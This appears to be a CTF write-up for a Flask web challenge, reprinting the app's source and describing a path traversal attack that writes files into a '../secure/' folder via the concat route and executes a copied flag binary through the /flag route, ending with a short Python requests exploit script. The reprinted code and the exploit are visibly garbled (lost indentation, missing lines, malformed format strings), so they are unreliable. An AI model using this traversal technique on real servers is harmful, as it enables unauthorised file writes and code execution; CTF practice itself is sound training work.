Tags: path-traversal web 

Rating: 2.0

First of all, i want to say, that author is kid in creating tasks. This code is awful.
**works as intended (c)**

Okay, we have source code (we could find it here: https://my-project.chujowyc.tf/source)

from PyPDF4 import PdfFileReader
from io import BytesIO
from uuid import uuid1
from flask import Flask, render_template_string, request, make_response, redirect, abort

app = Flask(__name__)

def check_tekstfile(file):
# pdf
# plik .txt
for c in file:
if c not in range(1, 128):
return False
return True
return True

def index():
with open('index.html', 'r') as f:
s = f.read()
return render_template_string(s)

def source():
with open('source.html', 'r') as f:
s = f.read()
return render_template_string(s)

@app.route('/upload', methods=['POST'])
def upload():
f = request.files['file']
s = f.read()
if not check_tekstfile(s):
return 'not a tekst'
uuid = uuid1().hex
with open('./files/' + f.filename + uuid, 'wb') as ff:
return 'link: Klik'

@app.route('/files', methods=['GET'])
def uploads():
return send_file('./files/' + request.args['filename'])
return 'no file'

# FIXME: z jakiegos powodu nie dziala concatowanie pdfow
@app.route('/concat', methods=['POST'])
def concat():
with open('./files/' + request.args['filename1'], 'rb') as f2:
s2 = f2.read()
f = request.files['file']
s = f.read()
if not check_tekstfile(s):
return 'not a tekst'
uuid = uuid1().hex
with open('./files/' + f.filename + uuid, 'wb') as ff:
ff.write(s2 + s)
return 'link: Klik'

@app.route('/flag/<name>', methods=['GET'])
def flag(name):
from pathlib import Path
from subprocess import check_output
import os
path = Path('./secure/').joinpath(name)
assert path.parent.name == 'secure'
assert path.name != 'print_flag'
assert open(path, 'rb').read(1) != ord('#')
os.chmod(path, 0o700, follow_symlinks=False)
return check_output([path]).decode('ascii')
The service has only 4 functions: upload, files, concat, flag (ans function **files** not working at all).

As we can understand, function *files* function not working, and for this reason we didn't interest in it.
Let's take attention to *flag* function. Here we check, if we take file from *secure* folder and filename isn't *print_flag*.
It is easy to understand, that we need to get *print_flag*.

Okey, let's try to use **path traversal** attack.

1) Upload file in **../secure/** folder (via concat)
2) Use *concat* function with file **../secure/filename** and **../secure/print_flag**
3) Use *flag/filename* to get flag.

Final code:
import requests as req

URL = ""
files = {"file": {"../secure/ctfby", ""} }

r = req.post(URL + "concat?filename".format("../secure/print_flag"), files=files)
uuid = r.text.split("filename")[1].split('">')[0]

r = req.get(URL + "flag/{}".format("ctfby" + uuid))

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